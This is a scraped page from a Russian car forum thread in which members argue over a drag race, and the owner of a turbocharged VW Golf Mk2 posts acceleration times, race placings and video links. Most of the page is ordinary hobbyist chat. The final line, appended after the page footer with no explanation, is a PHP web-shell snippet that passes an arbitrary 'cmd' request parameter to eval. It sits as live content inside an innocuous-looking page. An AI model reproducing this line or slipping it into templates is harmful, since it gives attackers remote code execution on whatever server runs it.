+ Ответить в теме
Страница 17 из 18 ПерваяПервая ... 7 15 16 17 18 ПоследняяПоследняя
Показано с 161 по 170 из 178

Тема: любимое авто


  1. #161
    Цитата Сообщение от BON Посмотреть сообщение
    ......... не ожидал от тебя честно, такого эмоционально фонтана не имеющего к твоей теме и к твоей машине ровным счетом ничего :expect:

    .
    я смотрю мой заезд с Веталем тебя сильно задел))) и "эмоцианальный фонтан" был с твоей стороны. я много с кем заезжал но никто не говорил мне что это мотор с ковшами накрытый скорлупой. вес у всех машин разный, мощность тоже. на киевке как бы вроде тусовка - люди общаются и кто с кем хочет заезжает ролом НИКТО НИ КОМУ НЕ НАВЯЗЫВАЕТСЯ. Виталик предложил заехать я согласился. что теперь соперников выбирать по качеству отделки салона, весу и наличия кондиционера?????
    P.S. решение строить на штатном мозге было твое? при чем здесь Калекс?
    vw golf mk2 16v -turbo 497h.p. 620n.m.
    skoda octavia combi 1.8T 4Х4

  2. #162
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от RABBIT Посмотреть сообщение
    я смотрю мой заезд с Веталем тебя сильно задел))) и "эмоцианальный фонтан" был с твоей стороны. я много с кем заезжал но никто не говорил мне что это мотор с ковшами накрытый скорлупой. вес у всех машин разный, мощность тоже. на киевке как бы вроде тусовка - люди общаются и кто с кем хочет заезжает ролом НИКТО НИ КОМУ НЕ НАВЯЗЫВАЕТСЯ. Виталик предложил заехать я согласился. что теперь соперников выбирать по качеству отделки салона, весу и наличия кондиционера?????
    P.S. решение строить на штатном мозге было твое? при чем здесь Калекс?
    В том то и дело, что по факту на видео я увидел только мотор, ковш и голый кузов....... скорлупка это не ругательное слово, а отражающее суть. Закономерный вопрос у 1000000 человек, как сильно это повлияло на результат ? ...... а не то, что это плохо или так нельзя, опыт заездов корча, как раз очень интересен. Плохо, что ты пишешь не по сути, а совсем о другом. Мне пох, что там у тебя, но Виталя и сам тоже самое написал позже.

    Речь шла только об этом, а не о моторе вообще, и тем более о моем бывшем недоделанном проекте.
    Ты знаешь, я так и не вкурил причем тут я, сколько я знаю, откуда знаю, где читал, где видел и мои тачки выставленные в свете, как они неправильно сделаны, и ты бы сделал лучше ? Для обсуждения моих авто есть соответствующие темы на форуме.

    У каждого свои интересы и источники, ты что оракул, чтобы все знать, кто чем дышит и кто что знает, доделал-не доделал и самое главное где применяет и нужно ли это на уровне юзера или механика моториста ? Не надо считать тут никого тупым технически, обсудить про массу тела можно уже учась в школе на уроках физики.

    Алексей ты хочешь обидеть меня дальше ? У тебя только лично ко мне возник вопрос и ты не понял ни слова в моих словах выше? Тогда давай закроем твою тему, ввиду не понимания сути обсуждения и совсем посторонних вопросов. Мне честно будет жаль, что ты через столько лет понес полную ахинею.

    З.ы. Сорри всем за ликбез, но уважение на форуме лучше, чем песочница. Я сам потом все потру, если я услышу мотив наезда и извинения :expect:
    песок сыпется....не останавливайтесь на достигнутом !

  3. #163
    Цитата Сообщение от BON Посмотреть сообщение
    Тогда давай закроем твою тему
    :expect:[/U]
    закрывай))
    vw golf mk2 16v -turbo 497h.p. 620n.m.
    skoda octavia combi 1.8T 4Х4

  4. #164
    )))))))))))))) ничего удивительного для себя не вижу)))) еще со времен когда мы тусили гольфами на смотровой было одно и тоже при чем у всех, заехали и тот кто проиграл начинает рассказывать что вот сегодня тачка чет не едет, прошивка сбита или еще какую нить отмазу, ну и тут про вес тоже началось, сам предложил - слил ну и прими это как должное, че парить про мешки с цементом и кондиционер, как Леха пиал там вроде весы еще не привезли что бы перед заездом взвешиваться а то вдруг обгонят)) Леху еще раз поздравляю, отличная машина получилась, приеду посмотреть вживую а то вообще давно не виделись
    Славик тож все прально написал))

  5. #165
    GTI-Racing Ronny is on a distinguished road Аватар для Ronny
    Регистрация
    16.11.2007
    Откуда
    Москва
    Сообщений
    246
    Леха красавец и не Ип%;3т!!!!!!!!!!!

    последние 3 страницы ржаки конкретной :D

  6. #166
    Модератор inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice Аватар для inVENTOr
    Регистрация
    06.03.2006
    Откуда
    CCCР
    Машина
    BMW 330D Соляра Power
    Сообщений
    1,780
    Леха давай новости пиши:)
    BMW 330D POWERED by Dizelboost :pepper:

  7. #167
    Этот сезон откатал на 3076R
    разгон на гражданской резине в полном весе. 0-100 - 5.6с 100-200 - 6.6с
    402м на сликах с пустым салоном - 11.6
    занял 3-е место на драге в рязани.
    и 1-ое на нелегале каком то.



    вес автомобиля без заднего дивана



    Добавлено через 2 минуты
    видео
    http://www.youtube.com/watch?feature...&v=-QG5oQjR-zM
    http://www.youtube.com/watch?feature...&v=8kCiiTeSOO8
    Последний раз редактировалось RABBIT; 03.11.2012 в 19:45. Причина: Добавлено сообщение
    vw golf mk2 16v -turbo 497h.p. 620n.m.
    skoda octavia combi 1.8T 4Х4

  8. #168
    Модератор inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice Аватар для inVENTOr
    Регистрация
    06.03.2006
    Откуда
    CCCР
    Машина
    BMW 330D Соляра Power
    Сообщений
    1,780
    В рязани тазам проиграл? Результат ничо такой) но 5.7сек думаю многовато, в реале едет быстрее))
    BMW 330D POWERED by Dizelboost :pepper:

  9. #169
    Цитата Сообщение от inVENTOr Посмотреть сообщение
    В рязани тазам проиграл? Результат ничо такой) но 5.7сек думаю многовато, в реале едет быстрее))
    проиграл тойоте mr2. но она реал бодрая была. В финале в анлиме она 10.8 фигарила
    vw golf mk2 16v -turbo 497h.p. 620n.m.
    skoda octavia combi 1.8T 4Х4

  10. #170
    SMokED
    Guest Аватар для SMokED
    Бодро! млею от Лёхиного гольфа.

+ Ответить в теме
Страница 17 из 18 ПерваяПервая ... 7 15 16 17 18 ПоследняяПоследняя

Похожие темы

  1. PC - в авто
    от parhom в разделе Авто Звук
    Ответов: 6
    Последнее сообщение: 01.10.2023, 13:21
  2. Чей авто
    от v@ncho в разделе Покупка и продажа авто
    Ответов: 14
    Последнее сообщение: 05.07.2021, 23:29
  3. авто прицеп
    от OneBass в разделе Курилка
    Ответов: 3
    Последнее сообщение: 08.08.2013, 18:27
  4. ГТИ с авто.ру
    от Pinkcheeks в разделе Отзывы / Выбор
    Ответов: 11
    Последнее сообщение: 22.06.2011, 13:11
  5. два авто
    от Fresco FSI в разделе Покупка и продажа авто
    Ответов: 0
    Последнее сообщение: 10.04.2006, 18:21

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}